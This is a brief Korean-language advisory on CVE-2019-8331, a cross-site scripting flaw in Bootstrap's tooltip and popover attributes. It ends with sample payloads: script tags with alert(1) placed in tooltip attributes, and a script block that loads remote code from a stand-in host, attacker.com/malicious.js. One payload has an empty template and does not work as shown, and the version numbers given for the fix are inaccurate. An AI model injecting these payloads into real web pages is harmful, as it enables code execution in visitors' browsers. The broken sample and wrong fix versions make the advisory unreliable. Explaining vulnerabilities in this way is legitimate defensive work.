
CVE-2019-8331 취약점
CVE-2019-8331은 웹사이트 및 모바일 애플리케이션 개발에 널리 사용되는 JavaScript 라이브러리인 Bootstrap에서 발견된 XSS(Cross-Site Scripting) 유형의 보안 취약점입니다. 이 취약점은 Bootstrap이 tooltip 또는 popover 요소의 data-template 속성과 함께 전송되는 데이터를 적절하게 필터링하지 않아 발생하며, 공격자가 웹페이지에 악성 코드를 삽입할 수 있게 합니다.
이 공격은 공격자가 tooltip 또는 popover로 표시될 데이터를 제어할 수 있는 경우 발생할 수 있습니다. 사용자가 tooltip 또는 popover를 활성화하면 악성 코드가 웹페이지에 삽입되고 사용자의 브라우저에서 실행될 수 있습니다.
이 취약점은 Bootstrap 버전 4.3.1 및 5.0.0-beta2에서 수정되었습니다. 관리자는 영향을 받는 Bootstrap 버전을 업데이트하여 이 취약점을 해결해야 합니다.
CVE-2019-8331 취약점에 대한 추가 세부 정보:
<x data-toggle="tooltip" data-template="">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
<script>
var script = document.createElement("script");
script.src = "https://attacker.com/malicious.js";
document.body.appendChild(script);
</script>